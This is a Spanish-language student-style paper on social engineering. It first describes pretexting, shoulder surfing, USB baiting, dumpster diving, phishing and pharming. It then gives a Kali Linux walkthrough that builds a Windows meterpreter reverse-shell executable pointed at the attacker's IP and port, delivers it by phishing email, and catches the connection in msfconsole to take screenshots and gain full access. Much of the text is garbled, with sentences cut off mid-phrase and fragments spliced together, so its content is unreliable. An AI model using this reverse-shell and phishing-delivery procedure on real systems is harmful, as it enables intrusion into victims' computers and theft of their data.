Documentos de Académico
Documentos de Profesional
Documentos de Cultura
1
Tabla de contenido
Ingeniería social................................................................................................................. 3
2
Ingeniería social
Tanto las personas como las empresas estamos expuestos a una serie de ataques en la
red que pueden llegar a recopilar información con la que podemos ser muy vulnerables,
afortunadamente existen varias herramientas que impiden que esto suceda, pero un hacker
simplemente se requiere utilizar otro medio diferente, aparece la ingeniería social, esta es
una técnica con manipulación psicológica especialmente ejercida sobre las personas que
tengan a su cargo información importante o necesaria sin que esta se dé cuenta que está
siendo manipulada.
Se nombra “Ingeniería social” ya que ingeniería significa ingenio y social hace referencia a
través del ingenio. El ingeniero social Christopher Hannagy la describe como: “Ingeniería
social es el acto de influir en una persona para que lleve a cabo una acción que puede, o
no, ser la mejor para sus intereses”. Las técnicas aplicadas pueden ser orientadas ya que
la acción puede ser una decisión libre en la posibilidad a la persona que la realiza.
Los medios para un ataque de un ingeniero social se pueden realizar por correos
reconocimiento exhaustivo para detectar cuáles son las personas que pueden manipular
aquella información importante y no le importa el tiempo que se tome para esto, pues una
de sus virtudes es la paciencia, utiliza para esto una serie de herramientas como son:
3
• El teléfono: poder utilizar una falsa identidad a través de engaños y persuadir al
objetivo a revelar los datos que son de su interés como claves, datos personales,
entre otros.
un área de trabajo donde se utiliza una técnica conocida como “Shoulder Surfing” la
cual significa mirar por encima del hombro o leer al revés con la cual se puede
• Una de las técnicas más usadas después de analizar a sus víctimas es dejar al
alcance de esta un dispositivo como memoria USB o cualquier tipo de otro que llame
manera de Phishing.
• Fuera de la oficina: el ingeniero social investiga las personas que pueden ser un
fácil objetivo con sus gustos, temores o cualquier cosa que le sea útil y así con
información valiosa.
electrónico), las páginas webs falsas (scam, sitio web modificado con fines
maliciosos) que son ampliamente utilizadas por este tipo de hacker, las personas
tienden a ser muy repetitivos con sus contraseñas y utilizan las más comunes como,
4
• La basura: se pueden encontrar una gran cantidad de información como listados
documentos, solo los tira. La basura si no se tiene la suficiente precaución con ella
• También se utiliza una técnica conocida como pharming, esta técnica es muy
Ahora haremos un ejemplo en Kali Linux de la manera como el ingeniero social utiliza una
El primer paso es conocer la dirección IP del atacante, en este caso la dirección IP del Kali
Linux con el comando ifconfig esto es después de loguearse como usuario root.
5
Lo primero es entrar al escritorio con el comando cd Escritorio/, luego en otra terminal se
arch x86 -f exe LHOST=IP del equipo atacante LPORT=Puerto deseado -o Nombre que se
le dará al archivo.exe. debe recordar que Linux toma en cuenta las letras mayúsculas y
minúsculas.
Se comienza con Windows ya que se hará para ejecutar en ese sistema operativo,
meterpreter es una serie de comandos para interactuar con la máquina del objetivo de una
manera segura, x86 para que se pueda utilizar en sistemas operativos tanto de 32 como de
64 bits, LPOTR para indicar cual es el puerto que se utilizará en la conexión y como se está
Con esto quedará el archivo generado guardado en la ruta dada, este se debe enviar al
equipo objetivo, lo más común para un phishing es un correo electrónico que cuando este
6
Se ejecuta el comando msfconsole
Luego set lhost IP del equipo atacante y después ser lport y el puerto designado y por último
escribe exploit
7
Una vez seguidos todos estos pasos la consola queda en espera para obtener los datos del
objetivo, en este se descargó el archivo y se ejecuta, debe saber que para la prueba se
listar todo su contenido. En él se puede observar el archivo que se envió para la prueba.
8
Con el comando sc reenshot se toma una captura de pantalla del equipo objetivo y con
Para conocer que otros comandos se pueden utilizar solo se escribe help y mostrará un
listado general.
De esta manera y utilizando los comandos apropiados se puede tener acceso total al